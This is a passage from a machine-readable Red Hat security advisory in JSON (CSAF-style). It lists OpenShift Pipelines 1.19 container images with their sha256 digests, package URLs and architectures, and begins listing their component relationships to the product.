"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3A1099a0d44f0ce925a9c05569d2f8a6854f15ef23cfdf0600eed1ff079f109331?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3A171ccb9aac2ff4225d89744322717e715f704cb35a0b8a34d2e83c7fce48e1ae?arch=s390x\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3A1f3da51efb5c0f7d6ce15ad8b76641a65d6d09be940346f9b5ff833453018ed0?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3A8d7567c15b6e4f6c2d9a882c172293e6cc39abad8bbea1b3b984236cac12a1f6?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3A5d968bf07907ef4f6d96b762dcdd78e6f1c77a3febec0ec9140378b57d7e2463?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A37122253ef0ef496790f23fc4ef13f5464d73ed78d51dc445a85fe6230cd998f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:f772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3Af772e6e7c0f1858aaf0e8ad78e27c4da89db45f9a1c633a9be9da5769ba0a4d7?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3A7df3be21706820ae8c6a16023c5b307a050601b93d1d31151d716545a667d187?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A0bb55fe516ba2a8ff98dde0b6fe0506f41481e353fec8af31754542d88a8ced1?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3Af8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A39ce75c550fd693dc0bf2ded4e8d15e20e6b8ba7fe63f095d0642c44d3bf3ed5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A8fe90449d2c94b550e5cac06207d9b65a64683f0878e857cee4a24b94c1b8bf2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3A6f879fcc0f49dd55a32a2394fb366a07fc9d53b7bf90638f7427b08e700efa1a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A1cfb56b8064232ea5e162717b07a9ea77cab7a9e62941ebbd71d95139f52b5e3?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3A58c4c251e79b007b3bffd7c8436d7b767340ad94eae70d90387d7176d4a5bdf2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3A887df82ba16869a9fdf336577a7f7ae9a90713dfbcaa8321f9ec45a20637cc5a?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A7b2727015d5b29531155977c8bed5422612614d694e28e8a01325340bf7a7410?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3A8736b16bee608eba7c8506963419149631fe93bdf30b71c3785391e01b803ba5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3A5e221f0a70ea5f3076abf10cd119587b59e25d8d224427179a273f0321bb1b58?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A862321e5cf9e4f17ab8048c7c56a7277306863747eb7d3903effe3a710ce1b30?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3A85a32495af126c1844fb64efc1eb45ffbe2f3069b83d9d1fdd28c8bb348306ba?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3A9f1f0e9fce42103820d425d59269863c05222b83846ae486c32cdb7e4e82c975?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Aa8188f7256377dec7f491883cb146168c665758647aa55e0a7d7a3fa0769ba00?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3A1f7c8d359b89378e49b8aa120893920194386f3838780bc0a6765c4829171f00?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A3ff1e00b4be7622fef6df0875e2b7de45d7e36c97137baf5709360c5039e6822?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3A2b6fb8c0a6413968bdd7e1974dbcb2342a855f921648276bf042104f088f80fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3A0b481534aeaae1d7a11af954ee26e8f1334b9b12be09a5a93252478b64427216?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:c77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3Ac77351a76c8d502498d5c7c34bcf4db6373e168607ee47c4b4bebd748a25165c?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3A9024faf5ebb76ea97bb05d13ee5cffaeaef6fc82609c54ce437a2c90caf30edf?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:fbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3Afbf7529efa66fa3919e8591f7c0c94219ebef705507b0717dce0d0544946b574?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:fb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3Afb1a1f150f40cc1a524277b6cfa063bec200572a61e4093e8446206438393f76?arch=amd64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:3db810d168a5a106e894b3bd701b32af7821f55e83713e98dcc7c3fc19ae0c41_s390x",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64"
},
"product_reference": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"relates_to_product_reference": "Red Hat OpenShift Pipelines 1.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64 as a component of Red Hat OpenShift Pipelines 1.19",
"product_id": "Red Hat OpenShift Pipelines 1.19:registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f8baf73dbf01840d3926d1f259128b2595f221fa0db8e7f0ad54c0c6b2b5a532_amd64"
},
